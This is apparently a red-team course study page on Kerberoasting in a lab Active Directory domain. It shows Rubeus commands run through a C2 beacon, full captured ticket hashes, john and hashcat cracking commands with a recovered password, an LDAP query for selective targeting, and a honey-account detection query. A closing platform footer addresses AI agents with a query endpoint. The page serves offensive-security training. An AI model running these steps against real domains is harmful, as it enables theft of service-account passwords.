> For the complete documentation index, see [llms.txt](https://yamortsa.gitbook.io/rto/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://yamortsa.gitbook.io/rto/kerberos/kerberoasting.md). # Kerberoasting Services run on a machine under the context of a user account. These accounts are either local to the machine (LocalSystem, LocalService, NetworkService) or are domain accounts (e.g. DOMAIN\mssql). A Service Principal Name (SPN) is a unique identifier of a service instance. SPNs are used with Kerberos to associate a service instance with a logon account, and are configured on the User Object in AD. \\ ![](https://files.cdn.thinkific.com/file_uploads/584845/images/76f/0cf/9d9/spn.png) \\ Part of the TGS returned by the KDC is encrypted with a secret derived from the password of the user account running that service. Kerberoasting is a technique for requesting TGS’ for services running under the context of domain accounts and cracking them offline to reveal their plaintext passwords. Rubeus `kerberoast` can be used to perform the kerberoasting. Running it without further arguments will roast every account in the domain that has an SPN (excluding krbtgt). ``` beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe kerberoast /simple /nowrap [*] Total kerberoastable users : 3 $krb5tgs$23$*mssql_svc$dev.cyberbotic.io$MSSQLSvc/sql-2.dev.cyberbotic.io:1433@dev.cyberbotic.io*$122A4848378D3CFFEF922BDEAAC3707A$8FE7692C9C318EC7B4630C929AD54F87784B9E52293020E17BB427BD3FD27BA3C491D264BE8082505F3A2C40142703042A7EC3E161828A89003A0FC7C8CC55111FA432C0F0F2ED3488711E3F845CABFAC9141D63D69397741752201561C02DAEB131C1E079CDE112C9203E91B6A55714261AD223DF2B6879C5DF3805362068DFE39EF51C88E35C45ACE05DF4503252478E9AFD69FA21192046C4E3D8ECA7801D460C4C7D6AF7026AA3A2235A584DA1CA29C16AB7BDF9B307F3EBE6DCA84B9ABEE66ABA070613293DD91EB89B33B6633EB3EB906350C9AED9AD03EE306743024C09AA9AE26582460164BC3160FE95284F33174B3263EEA22E270F9A2D274390BA4546C110E44D7A678F8E286FCBAC660FBF8A0F7CBD72F1FA71BE7F59661CD75847FB7882F8481DC3ABB665CBA7BAAB0600D1E11131E4FB1C0690FCB20D707D2B7906E38381116FCEB8E5F9DAA882A95A4F3D04CB890C6C24EA997361881AFE3003828F759E96AAFC23EB589EC778352C9C5E0109BE110E01A12AB8D15383BA0714EC68B9A666CA42488B3438B1D52517F6A0F94CA8A1A2B93D12B815C32E721F71DC1D5C34ED4D7E5FB11E8AA1E9CB0CDE6BC997E6DB5A3A29EE329337243488A1902F0F66271DF224080A6FED34313A9253F523766F6EB6523E661E425E98302596B4649FE97D566534CE6DAAB323C5118163D160D1747AE3776FFBECA7A7F4E7FAB55833268D529A16DE926F3B86854F4D662306462BDBBBC55421D8AA3C059D981A168C25663A676401A86F8AA9CC9F6A71B7C2C0B8500D78683B2FD39C74F228F83F4D9C1AFB051E91C5A59278B010B1DAA05DB799B170BD3422B74FBE068CB5BF980037A4B907DF8930379A79BFCEBF54B8AF22E22565EDE399A18FAFBC4F09ADF82C4446FAC2169174CBADD49518C286A67B320AF445AD12892497F2D0152C92145463CAD6C99AA5F331FBEE04BCD05CFE1D40C3DFFC3C1140743C1A31A814EEEE5199365AB332EA1F681D62D7B3FE2C0C2F02005B63482F110FF43B9BF1C743F0E4ECC62AEC2914C6A5965CC18F13DBF40959F6E7AD9893FC046D2E5B60F1415F83D522A2B7F0A0B32FC5E5F514165F4B0D2B661162550CE578B43653AF471FA119EAD12DA26FE778362458AAF58E94413B2814A0A1A215118BFD6B0F3BCC4B9AC9D28D51E1279F719D7E0B0CB33824E778CA77F92E0E3A28FAE76A107920734B2D9D81F4E35EBFA3C37E84EBD0CB72C2507CB2627ED3AA8CE32647CFADC288967BFA12F21C3F3A2FBDF6AC64A8743853337D086338ED0AAE6AB3594B78B2926E9DC02DE962D41B9146E0F7718E1C7EA2CB334C40B43C1294C88C68B17A813AD0C15AA8238FF81DB14EB5AB56C7E6ABE56CD0BB9FA02761E1838D0FC894F7E5B627AC959FFB6DE2E235830A5FAEE8D58FDC3098EC20E64D56323CC8C47987AA5B85E6CB165F36B5A6AE9499F6593E13B81F501D7430BFBADF7B03EFD1F65869F801AE78A22165D862132194B96A68ECA2F55BE3338346FBAF836C4D61AF9F7FC012C5F14B220C62349A130E6F4C8A1620866A370C2A433AE36C08E2E496CC833824C0873C5B5D7A8DA38A2C41CC89ADEA62F22B3CB47445D60116BE97EE96AC85C6F7E087AAC4C2 $krb5tgs$23$*squid_svc$dev.cyberbotic.io$HTTP/squid.dev.cyberbotic.io@dev.cyberbotic.io*$F819F7E05FCE5C6861D65E38E65ADF6C$A17248D5456E6A9641F60D9B4EB6AFA69373DFF265153E4E4663E4D01613D496D5AA45D14A5FD672412B25998342DA1D7894066CD47BF8B5C0805807E744937AC60B4AD19067C1D900B7A2ED4493EC6B77AE8FBC5F20DFF1D47BCB1F259C72FEA4219A1AAAE1BB1776491F364B1B5BA69D72015EEEFDB57F688D508DCE63312C5407D2E6347B6D30528ACC4464837DAE6820E0F27CCBA7A36B89B8BA5F782B48FFAEDB349D79571B58F7303579627E493B101F90613CDA0013FF27DD558E7E81CCF82B2953AEF650D8DFEAAAF427CD981CB85D57FCABCEA551303B1EE3AED2B542372599FC2C92A0CCDE8482D3B4344EA8DC7B0AEEBD0D24B5F79996E9BC758C28FCE9491D97B9CBEC80D28D8043E1B761703D20A6CAAF04255C082AC64392C4B6C8FF32585605342E07622DE9C2CDAF21BFFB7FEAB1FF19C2AD5D89340CC51D5B5AE50F702E2E45FA01C26DB5086E1FBBC67133F522BFC4A18D77630DAA174633E0E4DFF59737171606BB74C96C8B109AE5DB2BF49F464274D65FF3740B2EB8AE378AEB7E20D7607C785939673E2E8166DA88A274EA247388E6A18EF4B67600F0092F70BDAF0FF440D7C244A520A8CF0A6482CE837C6A927026DF6C0C27228C3039192D8B2B260C45C831609F89ED5B88D364E7327520850FD72072591B938E3412FBFF71FDB32B8A99117377C7B23783564CFD414FA114E45B497C90CEED124F9B291FBE422F824D86F426C0D6616AF4A9EADD21D7EE7370B9AFD1DBE66709D7D7963FF626BB9849C12A2252166BD586A67961935C761F42A03E8CEDB84435546474FAFB951DA4AA878A64C9EADD10962756B2455BBF7AA844FA17A5D158D27B6926FAFF930103861D229C4E15F1CDF7856AF55382F8054E3E00853BF924AEC68EAFD2786849FDE0E0B7D19DEA51029D1240BF832EB5C55D862FBE769A7A2D3F83475A46F80679B7E35FD58A0E6E4848E2CA1C82A6ECA2AC01201BB71F659987B7AB45B74A9CA524022752F6392199951B5B8AC032B8774989051B7FE21A9A9B207D50FC83D1337E31D1F5AF969174E78BC0C50496552E8CA6DCC681D88C59D199D594C4648C75D8FA6D5EFB9876E5E32088560DAD793BDF80A20389AB7E6444AA301736FA89F1EB622D590C8381FD6B97579525EBD4933B3768399A3480C42AE0F768F643528DDCC5A679156AADE780DB37CA61CF3AFAEE2ECF8996122C7C4A8A679C3DC99A1428801AED1D7C91574D6A50A79325FDC7C58FA85FE410D4F311451387C69691B0B37A0CCF890F8F725286C0AD28DB6294A8DC04346AC0167FAC80E4C041C31D2BDFCF948F4A82D843D4A928F3244868084C853B8E73B166E3C25F7E043F9A833CDF939476913E1D0795B10BB8709A11E41D1A20096E41F13F7703540F713F4EDD73D3B5EAAE904EE1305D960047DD6A27ADD3E06204403A76364369DD7395E84BE660147FD4893904B4B0F01355D0961D65D1BAAA97DC7EDD3321D8E6AE13EED9F070DEC8D4C70C3F67AEC23084CF6526252EA23B979463B8BE53CFC81909E6FA50D59A73878275F79BCB484BDB60BD3C1A9EAEA4EF613D7995BF5DB9E0C1D7D222D138C65C20155CD17697E6014F608BC78993EF2F8BDE339532C2F5587981579C7FBB $krb5tgs$23$*honey_svc$dev.cyberbotic.io$HoneySvc/fake.dev.cyberbotic.io@dev.cyberbotic.io*$B6424DAD1372B0E769F64D78848770BA$C2DE3B1FE0FA17EA680043183615A9280A6DAFB5A6A2FA43D6077E4542EACEBBCE2C8D299F1827A94AC9768D5211127A5734586FCD8FD929B12D64C1D72E8ADD2B0A051E8F21EBA9E6631CA775B287E6CA6071550AB27EE950A58B85E80B0C19B63537DC086BE7B44AFF685B232DED804645A7E2DC2A7967E6B7E44BFCAA67CCFEDD74EF1FFC73D7006FAD32B281EF1AF78650757C30BE64394475113176117C050766D5C8B8B3FA8D7226038AD0FF498FFA609B320233FC27C2772C3B92C9259DCDA26C069A5B1BFA14037D8E65F85F02BE1FA3AE567A1C6E6EFC9464E5B313B78588D9B6776701C67D3A514DC5A133B422C624224632FFCD50A5C20B7AAA7B04D692EA64E33A2B3A39B3F0DE58EEC4E3C9D14AB870797325D773CD477B3D498FB82CB8BC06FF4E1DC954465E9077642F050C59E296C05E8F4674F3411739E9C4CF0DF88E6CD68EF32B1D820379F6256CE5EE9EE10177F56BE9E364A59C9EFE3B07D6798EB8373D8EC5367D7C7DD402742264DEAEA939404CBA1673AAB05B6BC56C5FA9CDA7B67A0E330DF7C2E440713FF4F129B8E4A3E5F2A9294BD45BD0E9DBEC63377E87551C374D8D7FF19376A1ADABEBC579D9C607CA7FC8198598BC36D0F4DC799FA89EFABCACDB5AB4BD3498A212C59D3DF93FE008F5B71889633158A942411189496D4958812A71EA344B2F65F6CF5F94F99D12C84F56F25B92489D148C140ACC8D40D5DEC2C6C5B4892060D6806186A38E72CB9183B7391C3FAD8D104B0675C83F568608DA966D172B8588441F0838A5F6EFD354EEF6448F41DABB904A2FA724439B3AC96E035A35CCA9C993B5545A1771D11BE4F82CE1D58CEFFACF889099A81349DFE45D2C73CED9B85550D3C7B1B6624D9C5639DBBEA0B45F3990A5CFDC8B3DF697E12FB7800779575FB897761F0674B89A8D713EF0F744A64C824DAE6269C5BEE1A85F2434E2E8CC283F42C697EF1A74C7C522002301D4CB929A3E715BAF939978F9DD792005CFFA6FAB35D536C4092AA621D7CBC9B3302281BC66B904FA1C5687C981276D59409E794806BE340976D0DD5198E631B9D76BF57AFFB8C4D1F3913F3549A99E90D85CA58AE2C2838F4BB5093BA0F7CDC37F7D1281FB60929B3F9B0473AEE8F7AD4BCE08B1375F2222903F2C860F04D26DAF9D06A0E5E6A3312046A54C1E4DE57EBA411879DFA4420BA4AC854CA8830A56C4F7AA5D4082E16FFA99D297E58837C872D6B8AA0D38FD12EB70AB31FCDF104705DD26E5A38AE58B5633955ED4830E7590CA4C067C31C05861B2AF9EC3C408E2BF0256896B4242926B8A1A7D0221E93355AF0E64861A44CEE50DE6A65F6A767646F7961BC0866B4107BEFC6CD0AA3E682528E74B848A41A21293FD1CD222304FD2142F12BB85511B72FD22E82B94DA21D3B4AD098B016D9D5181E446CA8FD7D98F4784BEE65BD648074ABAB39849B784BF362EFACE9B210C8ECF550BFD7A74C207D4A05C9AD0FD4DCDCB135F421ADF69AEBF21DDA3716079E80B7A039C77DA8802A8D5463652ACD401E1DA06D4FBC4519AA657D19AE808C59693B45AA29328F2061183193A1D14F77A866B7E9AC8C381E5E9BE8BB621E05E71B5C6489B9BE105838415555FDAB70B71D2A7E750B8 ``` Even though Rubeus does not include the `krbtgt` account, it can [sometimes](https://twitter.com/_wald0/status/1361720293539139589) be cracked. \\ These hashes can be cracked offline to recover the plaintext passwords for the accounts. Use `--format=krb5tgs --wordlist=wordlist hashes` for john or `-a 0 -m 13100 hashes wordlist` for hashcat. ``` $ john --format=krb5tgs --wordlist=wordlist mssql_svc Cyberb0tic (mssql_svc$dev.cyberbotic.io) ``` \\ I experienced some hash format incompatibility with john. Removing the SPN so it became: `$krb5tgs$23$*mssql_svc$dev.cyberbotic.io*$6A9E[blah]` seemed to address the issue. \\ **OPSEC**\ \ By default, Rubeus will roast every account that has an SPN. Honey Pot accounts can be configured with a "fake" SPN, which will generate a 4769 event when roasted. Since these events will never be generated for this service, it provides a high-fidelity indication of this attack.\ \\ ``` event.code: 4769 and winlog.event_data.ServiceName: honey_svc ``` \\ A much safer approach is to enumerate possible candidates first and roast them selectively. This LDAP query will find domain users who have an SPN set. ``` beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=user)(servicePrincipalName=*))" --attributes cn,servicePrincipalName,samAccountName [*] TOTAL NUMBER OF SEARCH RESULTS: 4 [+] cn : krbtgt [+] servicePrincipalName : kadmin/changepw [+] samaccountname : krbtgt [+] cn : MS SQL Service [+] servicePrincipalName : MSSQLSvc/sql-2.dev.cyberbotic.io:1433 [+] samaccountname : mssql_svc [+] cn : Squid Proxy [+] servicePrincipalName : HTTP/squid.dev.cyberbotic.io [+] samaccountname : squid_svc [+] cn : Honey Token [+] servicePrincipalName : HoneySvc/fake.dev.cyberbotic.io [+] samaccountname : honey_svc ``` \\ We can roast an individual account the `/user` parameter. ``` beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe kerberoast /user:mssql_svc /nowrap [*] SamAccountName : mssql_svc [*] DistinguishedName : CN=MS SQL Service,CN=Users,DC=dev,DC=cyberbotic,DC=io [*] ServicePrincipalName : MSSQLSvc/sql-2.dev.cyberbotic.io:1433 [*] PwdLastSet : 8/15/2022 7:46:43 PM [*] Supported ETypes : RC4_HMAC_DEFAULT [*] Hash : $krb5tgs$23$*mssql_svc$dev.cyberbotic.io$MSSQLSvc/sql-2.dev.cyberbotic.io:1433@dev.cyberbotic.io*$122A4848378D3CFFEF922BDEAAC3707A$8FE7692C9C318EC7B4630C929AD54F87784B9E52293020E17BB427BD3FD27BA3C491D264BE8082505F3A2C40142703042A7EC3E161828A89003A0FC7C8CC55111FA432C0F0F2ED3488711E3F845CABFAC9141D63D69397741752201561C02DAEB131C1E079CDE112C9203E91B6A55714261AD223DF2B6879C5DF3805362068DFE39EF51C88E35C45ACE05DF4503252478E9AFD69FA21192046C4E3D8ECA7801D460C4C7D6AF7026AA3A2235A584DA1CA29C16AB7BDF9B307F3EBE6DCA84B9ABEE66ABA070613293DD91EB89B33B6633EB3EB906350C9AED9AD03EE306743024C09AA9AE26582460164BC3160FE95284F33174B3263EEA22E270F9A2D274390BA4546C110E44D7A678F8E286FCBAC660FBF8A0F7CBD72F1FA71BE7F59661CD75847FB7882F8481DC3ABB665CBA7BAAB0600D1E11131E4FB1C0690FCB20D707D2B7906E38381116FCEB8E5F9DAA882A95A4F3D04CB890C6C24EA997361881AFE3003828F759E96AAFC23EB589EC778352C9C5E0109BE110E01A12AB8D15383BA0714EC68B9A666CA42488B3438B1D52517F6A0F94CA8A1A2B93D12B815C32E721F71DC1D5C34ED4D7E5FB11E8AA1E9CB0CDE6BC997E6DB5A3A29EE329337243488A1902F0F66271DF224080A6FED34313A9253F523766F6EB6523E661E425E98302596B4649FE97D566534CE6DAAB323C5118163D160D1747AE3776FFBECA7A7F4E7FAB55833268D529A16DE926F3B86854F4D662306462BDBBBC55421D8AA3C059D981A168C25663A676401A86F8AA9CC9F6A71B7C2C0B8500D78683B2FD39C74F228F83F4D9C1AFB051E91C5A59278B010B1DAA05DB799B170BD3422B74FBE068CB5BF980037A4B907DF8930379A79BFCEBF54B8AF22E22565EDE399A18FAFBC4F09ADF82C4446FAC2169174CBADD49518C286A67B320AF445AD12892497F2D0152C92145463CAD6C99AA5F331FBEE04BCD05CFE1D40C3DFFC3C1140743C1A31A814EEEE5199365AB332EA1F681D62D7B3FE2C0C2F02005B63482F110FF43B9BF1C743F0E4ECC62AEC2914C6A5965CC18F13DBF40959F6E7AD9893FC046D2E5B60F1415F83D522A2B7F0A0B32FC5E5F514165F4B0D2B661162550CE578B43653AF471FA119EAD12DA26FE778362458AAF58E94413B2814A0A1A215118BFD6B0F3BCC4B9AC9D28D51E1279F719D7E0B0CB33824E778CA77F92E0E3A28FAE76A107920734B2D9D81F4E35EBFA3C37E84EBD0CB72C2507CB2627ED3AA8CE32647CFADC288967BFA12F21C3F3A2FBDF6AC64A8743853337D086338ED0AAE6AB3594B78B2926E9DC02DE962D41B9146E0F7718E1C7EA2CB334C40B43C1294C88C68B17A813AD0C15AA8238FF81DB14EB5AB56C7E6ABE56CD0BB9FA02761E1838D0FC894F7E5B627AC959FFB6DE2E235830A5FAEE8D58FDC3098EC20E64D56323CC8C47987AA5B85E6CB165F36B5A6AE9499F6593E13B81F501D7430BFBADF7B03EFD1F65869F801AE78A22165D862132194B96A68ECA2F55BE3338346FBAF836C4D61AF9F7FC012C5F14B220C62349A130E6F4C8A1620866A370C2A433AE36C08E2E496CC833824C0873C5B5D7A8DA38A2C41CC89ADEA62F22B3CB47445D60116BE97EE96AC85C6F7E087AAC4C2 ``` --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://yamortsa.gitbook.io/rto/kerberos/kerberoasting.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.